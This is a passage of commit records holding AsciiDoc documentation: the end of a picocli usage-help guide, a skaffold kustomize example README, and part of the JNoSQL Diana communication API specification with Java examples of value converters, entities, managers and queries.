sb = new StringBuilder()\n .append(help.headerHeading())\n .append(help.header())\n .append(help.synopsisHeading()) \/\/e.g. Usage:\n .append(help.synopsis()) \/\/e.g. <main> [OPTIONS] [ARGUMENTS]\n .append(help.descriptionHeading()) \/\/e.g. %nDescription:%n%n\n .append(help.description()) \/\/e.g. \"application description\"\n .append(help.parameterListHeading()) \/\/e.g. %nPositional parameters:%n%n\n .append(help.parameterList()) \/\/e.g. [FILE...] the files to convert\n .append(help.optionListHeading()) \/\/e.g. %nOptions:%n%n\n .append(help.optionList()) \/\/e.g. -h, --help displays this help\n .append(help.commandListHeading()) \/\/e.g. %nCommands:%n%n\n .append(help.commandList()) \/\/e.g. 
add adds a to b\n .append(help.footerHeading())\n .append(help.footer());\n----\nIn your application, instead of calling `CommandLine.usage(new MainClass(), System.err)`, you can alter the above code to, for example, list subcommands first, then global options and finally the parameters.\n\n=== Formatted Headings\nBy using the `Help` class directly as explained in the previous section,\nthe `xxxHeading()` methods can be passed arguments.\nThese arguments can be referenced by the format specifiers in the heading https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/Formatter.html[format strings]. For example:\n\n[source,java]\n----\n@Command(descriptionHeading = \"%nDescription (%1$tb %1$te, %1$tY)%n%n\")\nclass MainClass {}\n----\nThe `descriptionHeading` attribute is a format string with some date\/time conversion format specifiers and some line separators. Picocli will format this string with any arguments that are passed to the `Help::descriptionHeading(Object...)` method. For example:\n[source,java]\n----\nHelp help = new Help(new MainClass());\nCalendar c = new GregorianCalendar(2017, MAY, 23);\nString formatted = help.descriptionHeading(c);\n\nassert \"\\nDescription (May 23, 2017)\\n\\n\".equals(formatted);\n----\n\n\n\n== Advanced Usage Help Customization\n=== Custom Layout\n=== Table and Columns\n=== Option Renderer\n=== Parameter Renderer\n=== Param Label Renderer\n\n\n== Subcommands\n=== Registering Subcommands\n=== Usage Help for Subcommands\n\n\n\n== Subclassing to Reuse Options and Command Attributes\nPicocli will walk the class hierarchy to check for annotations, so you can declare common @Options and @Command attributes on a superclass and override these fields or attributes on a subclass.\n\nThe below example shows how common options like `help` and `version` can be declared as fields in a superclass so they are available in all subclasses. Similarly, annotating the superclass with default `@Command` attributes means subclasses won't need to set these attributes.\n\n[source,java]\n----\n@Command(synopsisHeading = \"%nUsage:%n%n\", descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n%n\", optionListHeading = \"%nOptions:%n%n\",\n commandListHeading = \"%nCommands:%n%n\", showDefaultValues = false)\npublic abstract class AbstractCommand {\n\n @Option(names = { \"-h\", \"-?\", \"--help\" }, help = true,\n description = \"give this help list\")\n protected boolean helpRequested;\n\n @Option(names = { \"-V\", \"--version\" }, help = true,\n description = \"print program version\")\n protected boolean versionRequested;\n}\n----\n\nAll commands that extend `AbstractCommand` support the `--help` and `--version` options, and generate a usage help message in the same spacious style. 
For example:\n\n[source,java]\n----\n@Command(name = \"zip\",\n header = \"Compresses the specified FILE(s).\",\n description = \"The default action is to add or replace zipfile entries from list, \" +\n \"which can include the special name - to compress standard input.\",\n footer = \"Copyright (c) 1990-2008 Info-ZIP - Type 'zip \\\"-L\\\"' for software license.\")\npublic class ZipCommand extends AbstractCommand {\n @Option(names = { \"-o\", \"--output\" }, description = \"output file to write to\")\n private File output;\n\n @Parameters(paramLabel = \"FILE\", description = \"FILEs to compress\")\n private File[] files;\n}\n----\n\n\n== Putting it all Together\nImagine an application that takes some input files and compresses them to an output file.\n----\nCompress -o outputFile file1 file2 file3\n----\nThe program takes one option (`-o`, the output file) and one or more input files.\nOne way to accomplish this with picocli looks like this:\n\n[source, java]\n----\nimport picocli.CommandLine.*;\nimport java.io.File;\n\n@Command(name = \"Compress\", header = \"Compresses the specified input files to an output file\")\npublic class Compress {\n @Parameters(arity = \"1..*\", description = \"one or more files to compress\")\n File[] inputFiles;\n\n @Option(names = {\"-o\", \"--outfile\"}, description = \"optional output file name. If omitted directory name is used.\")\n File outputFile;\n\n @Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\n boolean helpRequested;\n\n public static void main(String... args) {\n try {\n Compress compress = CommandLine.parse(new Compress(), args);\n if (compress.helpRequested) {\n CommandLine.usage(new Compress(), System.err);\n return;\n }\n compress.doCompress();\n } catch (ParseException ex) {\n System.err.println(ex.getMessage());\n CommandLine.usage(new Compress(), System.err);\n }\n }\n\n private void doCompress() { ... } \/\/ business logic of the application\n}\n----\n\n\n== Download\n\nNOTE: Here is the source. 
Copy and paste it into a file called `CommandLine.java`, add it to your project, and enjoy!\n\n[source,java]\n----\ninclude::..\/src\/main\/java\/picocli\/CommandLine.java[]\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2641e9676afdfa57e9a0a106ae2d3a29851e010","subject":"Update README.adoc","message":"Update README.adoc","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"integration\/examples\/kustomize\/README.adoc","new_file":"integration\/examples\/kustomize\/README.adoc","new_contents":"=== Example: kustomize\n:icons: font\n\nThis is an example demonstrating how skaffold can work with kustomize with the `skaffold deploy` command.\n\nifndef::env-github[]\n==== Example files\nlink:{github-repo-tree}\/examples\/kustomize[see on Github icon:github[]]\n\n[source,yaml, indent=3, title=skaffold.yaml]\n----\ninclude::skaffold.yaml[]\n----\n\n[source,yaml, indent=3, title=kustomization.yaml]\n----\ninclude::kustomization.yaml[]\n----\n\n[source,patch, indent=3, title=patch.yaml]\n----\ninclude::patch.yaml[]\n----\n\n[source,patch, indent=3, title=deployment.yaml]\n----\ninclude::deployment.yaml[]\n----\n\nendif::[]\n\n=== Example: passing arguments to kustomize\n:icons: font\n\nThis is an example demonstrating how additional arguments can be passed to the `kustomize build` command.\n\nifndef::env-github[]\n\n[source,yaml, indent=3, title=skaffold-kustomize-args.yaml]\n----\ninclude::skaffold-kustomize-args.yaml[]\n----\n\nendif::[]\n","old_contents":"=== Example: kustomize\n:icons: font\n\nThis is an example demonstrating how skaffold can work with kustomize with the `skaffold deploy` command.\n\nifndef::env-github[]\n==== Example files\nlink:{github-repo-tree}\/examples\/kustomize[see on Github icon:github[]]\n\n[source,yaml, indent=3, title=skaffold.yaml]\n----\ninclude::skaffold.yaml[]\n----\n\n[source,yaml, indent=3, title=kustomization.yaml]\n----\ninclude::kustomization.yaml[]\n----\n\n[source,patch, indent=3, title=patch.yaml]\n----\ninclude::patch.yaml[]\n----\n\n[source,patch, indent=3, title=deployment.yaml]\n----\ninclude::deployment.yaml[]\n----\n\nendif::[]\n\n=== Example: passing arguments to kustomize\n:icons: font\n\nThis is an example demonstrating how additional arguments can be passed to kustomize\n\nifndef::env-github[]\n\n[source,yaml, indent=3, title=skaffold-kustomize-args.yaml]\n----\ninclude::skaffold-kustomize-args.yaml[]\n----\n\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57cf8ede3cf460a13ef08d9f2a6977f24b88353a","subject":"fixes communi","message":"fixes communi\n","repos":"JNOSQL\/diana","old_file":"specification\/src\/main\/asciidoc\/communication.adoc","new_file":"specification\/src\/main\/asciidoc\/communication.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. 
This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== Communication API Introduction\n\n\nWith the strategy to divide and conquer on JNoSQL, the communication API was born. Its goal is to make the communication layer easy and extensible. Extensibility is more than important; it is entirely necessary, since the API must support the specific features of each database. Nonetheless, with a common API, the cost of changing to another database provider is lower than with a database-specific API.\n\nTo cover the three kinds of database, this API has three packages, one for each database type.\n\n* `org.jnosql.diana.column`\n* `org.jnosql.diana.document`\n* `org.jnosql.diana.key`\n\nIMPORTANT: The package name might change during the Jakarta EE process.\n\nThere isn't a Graph communication API because one already exists: link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop].\n\nSo, if a database is multi-model, supporting more than one NoSQL type, it will implement one API for each type it supports. Also, each API has a TCK to prove that the database is compatible with the API. Even across different NoSQL types, the APIs try to use the same nomenclature:\n\n* Configuration\n* Factory\n* Manager\n* Entity\n* Value\n\n=== The API structure\n\nThe communication layer has four projects:\n\n* The *communication-core*: The JNoSQL communication API common to all types.\n* The *communication-key-value*: The JNoSQL communication API layer to key-value database.\n* The *communication-column*: The JNoSQL communication API layer to column database.\n* The *communication-document*: The JNoSQL communication API layer to document database.\n\nEach module works separately; thereby, a NoSQL vendor just needs to implement the specific type, e.g., a key-value provider will implement only the key-value API. If a NoSQL database already has a driver, this API can work as an adapter with the current one. For multi-model NoSQL databases, providers will implement each API they need.\n\nWARNING: For the Graph communication API, there is the link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop] that won\u2019t be covered in this documentation.\n\n\n=== Value\n\nThis interface represents the value that will be stored; it is a wrapper that serves as a bridge between the database and the application. E.g., if a database does not support a Java type, it may do the conversion with ease.\n\n[source,java]\n----\nValue value = Value.of(12);\n----\n\nThe Value interface has the methods:\n\n* `Object get();` Returns the value as Object.\n\n* `<T> T get(Class<T> clazz);` Does the conversion process to the required type, which is the safer way to do it. If the required type doesn\u2019t have support, it will throw an exception, although the API allows creating custom converters.\n\n* `<T> T get(TypeSupplier<T> typeSupplier);` Similar to the previous method, it does the conversion process but using a structure that uses generics such as List, Map, Stream and Set.\n\n[source,java]\n----\nValue value = Value.of(12);\nString string = value.get(String.class);\nList<Integer> list = value.get(new TypeReference<List<Integer>>() {});\nSet<Long> set = value.get(new TypeReference<Set<Long>>() {});\nStream<Integer> stream = value.get(new TypeReference<Stream<Integer>>() {});\nObject integer = value.get();\n----
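To make the difference between `get()` and `get(Class)` concrete, here is a minimal sketch that wraps a numeric `String`; whether a `String`-to-`Integer` converter is available is an assumption about the provider, not a guarantee of the API.\n\n[source,java]\n----\nValue value = Value.of(\"10\");\n\/\/ returns the raw stored object with no conversion: the String \"10\"\nObject raw = value.get();\n\/\/ converts to the required type, assuming a String-to-Integer converter is registered\nInteger number = value.get(Integer.class);\n----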
==== Make custom Writer and Reader\n\nAs mentioned before, the `Value` interface is used to store information in a database. The API already has support for Java types such as primitive types, wrapper types, and the new Java 8 date and time types. Furthermore, the developer can create a custom converter easily and quickly. There are two interfaces for this:\n\n\n* `ValueWriter`: This interface represents how a `Value` instance is written to a database.\n* `ValueReader`: This interface represents how the `Value` will be converted back to the Java application. This interface will be used by `<T> T get(Class<T> clazz)` and `<T> T get(TypeSupplier<T> typeSupplier)`.\n\nBoth implementations are loaded from the Java SE ServiceLoader resource. So, for the Communication API to learn a new type, just register it on the ServiceLoader, e.g., given a Money type:\n\n[source,java]\n----\npublic class Money {\n\n private final String currency;\n\n private final BigDecimal value;\n\n Money(String currency, BigDecimal value) {\n this.currency = currency;\n this.value = value;\n }\n\n public String getCurrency() {\n return currency;\n }\n\n public BigDecimal getValue() {\n return value;\n }\n\n @Override\n public String toString() {\n return currency + ' ' + value;\n }\n\n public static Money parse(String text) {\n String[] texts = text.split(\" \");\n return new Money(texts[0], BigDecimal.valueOf(Double.valueOf(texts[1])));\n }\n}\n----\n\nJust to be more didactic, this documentation creates a simple money representation. As everyone knows, reinventing the wheel is not a good practice, so in production the Java developer should use mature money APIs such as link:https:\/\/github.com\/JavaMoney[Moneta], the reference implementation of link:https:\/\/jcp.org\/en\/jsr\/detail?id=354[JSR 354].\n\nThe first step is to create the converter from the custom type to the database, the `ValueWriter`. It has two methods:\n\n* `boolean isCompatible(Class clazz)`: Checks if the given class has support for this implementation.\n* `S write(T object)`: Once the implementation supports the type, this method converts a `T` instance to the `S` type.\n\n\n[source,java]\n----\npublic class MoneyValueWriter implements ValueWriter<Money, String> {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public String write(Money money) {\n return money.toString();\n }\n}\n----
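A quick usage sketch of the writer above; the `\"USD 10\"` value is only an illustration:\n\n[source,java]\n----\nMoney money = Money.parse(\"USD 10\");\n\/\/ Money.toString() concatenates currency and value, so the stored text is \"USD 10.0\"\nString stored = new MoneyValueWriter().write(money);\n----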
With the `MoneyValueWriter` created, the Money type will be saved as a String; the next step is to read that information back into the Java application with a `ValueReader` implementation. This interface has two methods:\n\n* `boolean isCompatible(Class clazz)`: Checks if the given class has support for this implementation.\n* `<T> T read(Class<T> clazz, Object value)`: Converts the Object instance to the `T` type.\n\n[source,java]\n----\npublic class MoneyValueReader implements ValueReader {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public <T> T read(Class<T> clazz, Object value) {\n return (T) Money.parse(value.toString());\n }\n}\n----\n\nAfter both implementations are done, the last step is to register them into two files:\n\n* `META-INF\/services\/org.jnosql.ValueReader`\n* `META-INF\/services\/org.jnosql.ValueWriter`\n\nEach file will have the qualifier of its respective implementation:\n\nThe file `org.jnosql.ValueReader` will have:\n\n```\nmy.company.MoneyValueReader\n```\n\nThe file `org.jnosql.ValueWriter` will have:\n\n```\nmy.company.MoneyValueWriter\n```\n\n[source,java]\n----\nValue value = Value.of(\"BRL 10.0\");\nMoney money = value.get(Money.class);\nList<Money> list = value.get(new TypeReference<List<Money>>() {});\nSet<Money> set = value.get(new TypeReference<Set<Money>>() {});\n----\n\n\n=== Element Entity\n\nThe *Element entity* is a small piece of an entity body; the exception is the key-value structure type, since this structure is simple. E.g., in the column family structure, the entity has columns, and each column element has a tuple where the key is the name and the value is the information as a `Value` implementation.\n\n* *Document*\n* *Column*\n\n\n==== Document\n\nThe `Document` is a small piece of a Document entity. Each document has a tuple where the key is the document name, and the value is the information itself as `Value`.\n\n[source,java]\n----\nDocument document = Document.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nThe document might have another document inside; the subdocument concept.\n\n[source,java]\n----\nDocument subDocument = Document.of(\"subDocument\", document);\n----\n\nThe way to store information in subdocuments will also depend on each driver's implementation.\n\nTo access the information from `Document`, it has an alias method to `Value`; in other words, it does a conversion directly from the `Document` _interface_.\n\n[source,java]\n----\nDocument age = Document.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----
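Reading a nested document back can be as simple as unwrapping the raw value; a minimal sketch (how the nested structure is returned may vary by driver):\n\n[source,java]\n----\nDocument owner = Document.of(\"owner\", Document.of(\"name\", \"Ada\"));\n\/\/ get() returns the stored object as-is, here the nested Document\nDocument nested = (Document) owner.get();\nString value = nested.get(String.class); \/\/ \"Ada\"\n----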
==== Column\n\nThe Column is a small piece of the column family entity. Each column has a tuple where the name represents a key and the value is the information itself as a `Value` implementation.\n\n[source,java]\n----\nColumn column = Column.of(\"name\", \"value\");\nValue value = column.getValue();\nString name = column.getName();\n----\n\nWith this interface, we may have a column inside a column.\n\n\n[source,java]\n----\nColumn subColumn = Column.of(\"subColumn\", column);\n----\n\nThe way to store a subcolumn, as well as its information, will also depend on each driver's implementation.\n\nTo access the information from `Column`, it has an alias method to `Value`; thus, you can do a conversion directly from the `Column` _interface_.\n\n[source,java]\n----\nColumn age = Column.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n=== Entity\n\nThe Entity is the body of the information that goes to the database; each database type has an Entity:\n\n* ColumnEntity\n* DocumentEntity\n* KeyValueEntity\n\n==== ColumnEntity\n\nThe `ColumnEntity` is an entity of the column family database type. It is composed of one or more columns. As a result, the Column is a tuple of name and value.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nentity.add(Column.of(\"id\", Value.of(10L)));\nentity.add(Column.of(\"version\", 0.001));\nentity.add(Column.of(\"name\", \"Diana\"));\nentity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Column> columns = entity.getColumns();\nOptional<Column> id = entity.find(\"id\");\n----\n\n==== DocumentEntity\n\nThe `DocumentEntity` is an entity of the document collection database type. It is composed of one or more documents. As a result, the Document is a tuple of name and value.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"documentFamily\");\nString name = entity.getName();\nentity.add(Document.of(\"id\", Value.of(10L)));\nentity.add(Document.of(\"version\", 0.001));\nentity.add(Document.of(\"name\", \"Diana\"));\nentity.add(Document.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Document> documents = entity.getDocuments();\nOptional<Document> id = entity.find(\"id\");\nentity.remove(\"options\");\n----\n\n==== KeyValueEntity\n\nThe `KeyValueEntity` is the simplest structure; it has a tuple with a key-value structure. Like the previous entities, it has direct access to the information using the alias methods to `Value`.\n\n[source,java]\n----\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", Value.of(123));\nKeyValueEntity<Integer> entity2 = KeyValueEntity.of(12, \"Text\");\nString key = entity.getKey();\nValue value = entity.getValue();\nInteger integer = entity.get(Integer.class);\n----
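The `find` method pairs naturally with the alias conversion; a small sketch using only calls shown above:\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nentity.add(Column.of(\"id\", Value.of(10L)));\nOptional<Column> id = entity.find(\"id\");\n\/\/ converts the stored Value only when the column is present\nid.ifPresent(column -> System.out.println(column.get(Long.class)));\n----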
=== Manager\n\nThe Manager is the class that pushes information to a database and retrieves it. The manager might have a synchronous and an asynchronous implementation.\n\n\n* *DocumentCollectionManager*\n* *DocumentCollectionManagerAsync*\n* *ColumnFamilyManager*\n* *ColumnFamilyManagerAsync*\n* *BucketManager*\n\n==== Document Manager\n\nThe manager class for the document type can be synchronous or asynchronous:\n\n* *DocumentCollectionManager*: To do synchronous operations.\n* *DocumentCollectionManagerAsync*: To do asynchronous operations.\n\n===== DocumentCollectionManager\n\nThe `DocumentCollectionManager` is the class that manages the persistence in a synchronous way for the document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManager manager = \/\/instance;\n\/\/insert operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== DocumentCollectionManagerAsync\n\nThe `DocumentCollectionManagerAsync` is the class that manages the persistence in an asynchronous way for the document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManagerAsync managerAsync = \/\/instance\n\n\/\/insert operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes in an asynchronous process, it's important to know when this process is over, so the `DocumentCollectionManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<DocumentEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a document collection\n\nThe Document Communication API has support to retrieve information in both ways, synchronous and asynchronous, using the `DocumentQuery` class. The `DocumentQuery` has information such as the sort type, the document, and also the condition to retrieve information.\n\nThe condition on `DocumentQuery` is given by `DocumentCondition`, which holds the condition type and the document. E.g., the condition below is to find a name equal to \"**Ada**\".\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\nDocumentCondition youngerThan2Years = DocumentCondition.lt(Document.of(\"age\", 2));\nDocumentCondition condition = nameEqualsAda.and(youngerThan2Years);\nDocumentCondition nameNotEqualsAda = nameEqualsAda.negate();\n----
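The **OR** aggregator follows the same fluent style; a short sketch, assuming the `or` method mirrors `and` on `DocumentCondition`:\n\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\nDocumentCondition youngerThan2Years = DocumentCondition.lt(Document.of(\"age\", 2));\n\/\/ matches when either condition holds\nDocumentCondition either = nameEqualsAda.or(youngerThan2Years);\n----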
If there isn\u2019t a condition in the query, that means the query will try to retrieve all information from the database, similar to a \u201c`select * from database`\u201d in a relational database, just remembering that the return depends on the driver. It is important to say that not all NoSQL databases have support for this resource.\n`DocumentQuery` also has a pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentQuery query = DocumentQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\nList<DocumentEntity> entities = manager.select(query);\nOptional<DocumentEntity> entity = manager.singleResult(query);\nConsumer<List<DocumentEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Document Collection\n\nAs with `DocumentQuery`, there is a class to remove information from the document database type: the `DocumentDeleteQuery` type.\n\nIt is simpler than `DocumentQuery` because there is no pagination or sort feature, since this information is unnecessary for removing information from the database.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentDeleteQuery query = DocumentQueryBuilder.delete().from(\"collection\").where(\"age\").gt(10).build();\nmanager.delete(query);\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n==== Column Manager\n\nThe Manager class for the column family type can be synchronous or asynchronous:\n\n* *ColumnFamilyManager*: To do synchronous operations.\n* *ColumnFamilyManagerAsync*: To do asynchronous operations.\n\n===== ColumnFamilyManager\n\nThe `ColumnFamilyManager` is the class that manages the persistence in a synchronous way for the column family.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManager manager = \/\/instance;\n\n\/\/inserts operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== ColumnFamilyManagerAsync\n\nThe `ColumnFamilyManagerAsync` is the class that manages the persistence in an asynchronous way for the column family.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManagerAsync managerAsync = \/\/instance\n\n\/\/inserts operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes in an asynchronous process, it's important to know when this process is over, so the `ColumnFamilyManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<ColumnEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----
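When the caller needs to block until an asynchronous operation finishes, the callback can release a plain `java.util.concurrent.CountDownLatch`; a minimal sketch:\n\n[source,java]\n----\nCountDownLatch latch = new CountDownLatch(1);\nConsumer<ColumnEntity> callBack = e -> latch.countDown();\nmanagerAsync.insert(entity, callBack);\nlatch.await(); \/\/ blocks until the insert callback fires; may throw InterruptedException\n----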
===== Search information on a column family\n\n\nThe Column communication API has support to retrieve information in both ways, synchronous and asynchronous, using the `ColumnQuery` class. The `ColumnQuery` has information such as the sort type, the column, and also the condition to retrieve information.\n\nThe condition on `ColumnQuery` is given by `ColumnCondition`, which holds the condition type and the column. E.g., the condition below is to find a name equal to \"**Ada**\".\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \"Ada\"));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \"Ada\"));\nColumnCondition youngerThan2Years = ColumnCondition.lt(Column.of(\"age\", 2));\nColumnCondition condition = nameEqualsAda.and(youngerThan2Years);\nColumnCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t a condition in the query, that means the query will try to retrieve all information from the database, similar to a \u201c`select * from database`\u201d in a relational database, just remembering that the return depends on the driver. It is important to say that not all NoSQL databases have support for this resource.\n\n`ColumnQuery` also has a pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\nColumnQuery query = ColumnQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\n\nList<ColumnEntity> entities = manager.select(query);\nOptional<ColumnEntity> entity = manager.singleResult(query);\n\nConsumer<List<ColumnEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Column Family\n\nAs with `ColumnQuery`, there is a class to remove information from the column database type: the `ColumnDeleteQuery` type.\n\nIt is simpler than `ColumnQuery` because there is no pagination or sort feature, since this information is unnecessary for removing information from the database.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\n\nColumnDeleteQuery query = ColumnQueryBuilder.delete()\n .from(\"collection\").where(\"age\").gt(10).build();\n\nmanager.delete(query);\n\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n\n==== BucketManager\n\nThe `BucketManager` is the class which saves the `KeyValueEntity` in a synchronous way in a key-value database.\n\n[source,java]\n----\nBucketManager bucketManager = \/\/instance;\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", 1201);\nSet<KeyValueEntity<String>> entities = Collections.singleton(entity);\nbucketManager.put(\"key\", \"value\");\nbucketManager.put(entity);\nbucketManager.put(entities);\nbucketManager.put(entities, Duration.ofHours(2));\/\/two hours TTL\nbucketManager.put(entity, Duration.ofHours(2));\/\/two hours TTL\n----\n\n===== Removing and retrieving information from a key-value database\n\nWith a simple structure, the bucket needs a key to both retrieve and delete information from the database.\n\n[source,java]\n----\nOptional<Value> value = bucketManager.get(\"key\");\nIterable<Value> values = bucketManager.get(Collections.singletonList(\"key\"));\nbucketManager.remove(\"key\");\nbucketManager.remove(Collections.singletonList(\"key\"));\n----
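Since `get` returns an `Optional<Value>`, an absent key can be handled without null checks; a small sketch:\n\n[source,java]\n----\nOptional<Value> value = bucketManager.get(\"key\");\n\/\/ converts the stored Value when present and falls back to a default otherwise\nInteger number = value.map(v -> v.get(Integer.class)).orElse(0);\n----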
include::communication_query.adoc[]\n\n=== Factory\n\nThe factory class creates the *Managers*.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n* *BucketManagerFactory*\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\n\n==== Column Family Manager Factory\n\nThe factory classes have the duty to create the column family manager.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n\nThe `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory` create the manager synchronously and asynchronously, respectively.\n\n[source,java]\n----\nColumnFamilyManagerFactory factory = \/\/instance\nColumnFamilyManagerAsyncFactory asyncFactory = \/\/instance\nColumnFamilyManager manager = factory.get(\"database\");\nColumnFamilyManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Document Collection Factory\n\nThe factory classes have the duty to create the document collection manager.\n\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\nThe `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory` create the manager synchronously and asynchronously, respectively.\n\n[source,java]\n----\nDocumentCollectionManagerFactory factory = \/\/instance\nDocumentCollectionManagerAsyncFactory asyncFactory = \/\/instance\nDocumentCollectionManager manager = factory.get(\"database\");\nDocumentCollectionManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Bucket Manager Factory\n\nThe factory classes have the duty to create the bucket manager.\n\n\n[source,java]\n----\nBucketManagerFactory bucketManager = \/\/instance\nBucketManager bucket = bucketManager.getBucketManager(\"bucket\");\n----\n\nBeyond the BucketManager, some databases have support for particular structures represented in the Java world such as `List`, 